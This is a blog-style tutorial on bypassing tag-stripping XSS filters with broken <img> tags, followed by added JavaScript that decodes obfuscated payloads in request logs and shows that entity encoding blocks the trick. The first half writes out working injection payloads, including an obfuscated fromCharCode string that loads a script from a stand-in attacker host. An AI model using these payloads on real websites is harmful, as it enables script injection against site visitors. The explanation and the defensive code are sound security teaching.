Cross-Site Scripting with Broken IMG Tags
Cross-site scripting (XSS) is the injection of script code into the results returned by a vulnerable website. This type of vulnerability allows an attacker to run malicious script in the context of a trusted site, and bad things ensue. Any web application that stores or reflects a value that users can manipulate must sanitize that value to prevent XSS vulnerabilities.
A common XSS sanitization approach is to remove all tags from the submitted value. Often, the routines used to remove tags do not properly handle broken tags, that is, tags that have no closing angle bracket. Modern web browsers are designed to gracefully handle poorly formed HTML and can be tricked into running script called from a broken tag.
My favorite tool for the broken tag attack is <img>. If I discover a reflected value that will allow me to inject a < into the results, I know I've got a shot at getting the broken tag to work. In its simplest form, the broken tag injection looks like:
<img src='/image.png' onLoad='alert("xss");'
Even without the closing > the tag will be processed and the onLoad function called. The alert could be replaced with a document.write to include additional code from a remote source. Since we're attempting to bypass a character filter, any injected code must avoid the closing angle bracket that would trigger the defenses. One way to do this is to use the injected image tag to unpack some obfuscated code:
<img src='/image.png' onLoad='document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,97,116,116,97,99,107,114,46,110,101,116,47,120,115,115,46,106,115,39,62,60,47,115,99,114,105,112,116,62))'
When the injected code above runs, the array of character codes is decoded and written to the page as:
<script src='http://attackr.net/xss.js'></script>
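As an added example for reviewers of request logs (not code from the original post), the following decodes any String.fromCharCode(...) sequence found in a parameter value, so the obfuscated text can be read as the markup it would write. The sample log parameter is constructed and uses only the codes for the literal text <script>.

```javascript
// Added example, not from the original post: reveal what a
// String.fromCharCode(...) payload would write by decoding its numeric list.
// The sample parameter below is constructed for this demonstration.

const FROM_CHAR_CODE = /String\.fromCharCode\(\s*([\d\s,]+)\)/gi;

// Return every decoded fromCharCode sequence found in `text`.
function decodeCharCodeCalls(text) {
  const decoded = [];
  for (const m of text.matchAll(FROM_CHAR_CODE)) {
    const codes = m[1]
      .split(",")
      .map((n) => parseInt(n.trim(), 10))
      .filter(Number.isInteger);
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// True when decoded text would introduce an HTML element (opening or closing).
function looksLikeMarkup(decodedText) {
  return /<\s*\/?[a-z]/i.test(decodedText);
}

// Constructed sample: a query parameter as it might appear in an access log.
// The codes 60,115,99,114,105,112,116,62 spell the text "<script>".
const sampleParam =
  "name=<img src='/image.png' onLoad='document.write(" +
  "String.fromCharCode(60,115,99,114,105,112,116,62))'";

// Review one logged parameter: decode and flag anything that decodes to markup.
function reviewParameter(param) {
  const decoded = decodeCharCodeCalls(param);
  return { decoded, suspicious: decoded.some(looksLikeMarkup) };
}

console.log(reviewParameter(sampleParam));
```

The decoded strings are what matter for triage: a value that decodes to an opening tag is the kind of parameter the tag-stripping filter described above let through.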
In addition to removing HTML tags, it is beneficial to convert all user-submitted angle brackets to the &lt; and &gt; HTML entities. This directly stops any broken HTML tag, since no element can begin without a literal <. It does not address injection directly into script code, which other vulnerabilities might permit.
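The following added example (not code from the original post) puts a naive tag-stripping sanitizer next to entity encoding and runs both over the post's broken <img> tag. The sample inputs and the regular expressions are constructed for this demonstration.

```javascript
// Added example, not from the original post: why stripping complete tags
// misses a broken tag, and why entity-encoding angle brackets does not.
// Inputs and regular expressions here are constructed for the demonstration.

// Naive sanitizer: removes anything that looks like a complete tag.
// A tag with no closing '>' never matches this pattern and survives untouched.
function stripTags(input) {
  return input.replace(/<[^>]*>/g, "");
}

// Entity-encode the characters that matter in an HTML text context.
// Once '<' becomes '&lt;', no element, broken or complete, can start from user data.
function encodeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Check used to judge each sanitizer's output: is there still an element
// start followed by an event-handler attribute (onload=, onerror=, ...)?
function containsLiveTag(output) {
  return /<\s*[a-z][^>]*\bon[a-z]+\s*=/i.test(output);
}

// Constructed samples: a complete tag and the broken-tag variant from the post.
const completeTag = "<img src='/image.png' onload='alert(1)'>";
const brokenTag = "<img src='/image.png' onload='alert(1)'";

// Run both sanitizers over each sample and report whether a live tag remains.
function compareSanitizers(samples) {
  return samples.map((s) => ({
    input: s,
    stripped: stripTags(s),
    strippedStillLive: containsLiveTag(stripTags(s)),
    encoded: encodeHtml(s),
    encodedStillLive: containsLiveTag(encodeHtml(s)),
  }));
}

for (const r of compareSanitizers([completeTag, brokenTag])) console.log(r);
```

For the complete tag both approaches neutralize the input; for the broken tag only entity encoding does, which is the point of the recommendation above. Encoding belongs at the output stage, in the HTML text context, and does not cover values placed inside script blocks or attributes that other code generates.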
